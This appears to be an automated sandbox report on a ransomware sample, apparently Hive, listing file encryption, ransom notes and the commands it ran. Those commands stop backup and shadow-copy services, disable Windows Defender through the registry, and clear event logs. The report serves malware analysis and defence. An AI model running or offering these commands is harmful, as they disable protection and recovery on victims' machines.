Analysis Overview
SHA256
eba2f0afd491ee595cd6908494e9e2a2115ed71c053c6d7b94970f1985830ada
Threat Level: Known bad
The file 7987a020052048ad0ec8855c08df2f47c89922f.exe was found to be: Known bad.
Malicious Activity Summary
Hive
Modifies Windows Defender Real-time Protection settings
Deletes Windows Defender Definitions
Modifies security service
Modifies boot configuration data using bcdedit
Deletes shadow copies
Clears Windows event logs
Modifies extensions of user files
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Windows directory
Drops file in Program Files directory
Runs net.exe
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Opens file in notepad (likely ransom note)
Suspicious behavior: EnumeratesProcesses
Interacts with shadow copies
Runs ping.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-02-17 10:21
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-02-17 10:21
Reported
2022-02-17 10:23
Platform
win7-en-20211208
Max time kernel
86s
Max time network
19s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\FormatProtect.tif => C:\Users\Admin\Pictures\FormatProtect.tif.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\FormatProtect.tif.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\FormatSplit.crw => C:\Users\Admin\Pictures\FormatSplit.crw.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\FormatSplit.crw.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SwitchConvert.raw => C:\Users\Admin\Pictures\SwitchConvert.raw.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SwitchConvert.raw.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UnpublishReset.raw => C:\Users\Admin\Pictures\UnpublishReset.raw.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UnpublishReset.raw.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21481_.GIF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_K_COL.HXK.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\EquityResume.Dotx.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\20.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\C3QW_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\pagecurl.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_play.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0294991.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0282932.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-actions.xml.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01366_.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099146.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_ja.jar.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00686_.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\ONENOTE.HXS.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vilnius.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_olv.css.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SONORA\PREVIEW.GIF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\MSB1CACH.LEX.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00918_.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Urban.xml.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\EADOCUMENTAPPROVAL_REVIEW.XSN.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Montevideo.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Vladivostok.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-full.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\utilityfunctions.js.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\mset7fr.kic.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0151067.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0090781.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00917_.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\C3QW_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFNOT.CFG.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\TAB_ON.GIF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\37.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mng.txt.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18191_.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\OrielMergeFax.Dotx.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0185604.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00435_.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0300862.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\InfoPathOMFormServicesV12\Microsoft.Office.InfoPath.xml.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\C3QW_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\C3QW_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_dot.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\weather.css | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Lisbon.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\GRDEN_01.MID.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Bucharest.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Document.gif.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_windy.png | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7-zip.chm.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\de-DE\css\cpu.css | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\de-DE\msinfo32.exe.mui | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0301252.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_IAAAACAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0304933.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL065.XML.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\CONCRETE\PREVIEW.GIF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00525_.WMF.QQ6hUG7bZHrKX3pLQohXyb_dGb7IbZ9az4IgYMiejfr_AAAAAAAAAAA0.qmam4 | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe
"C:\Users\Admin\AppData\Local\Temp\7987a020052048ad0ec8855c08df2f47c89922f.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
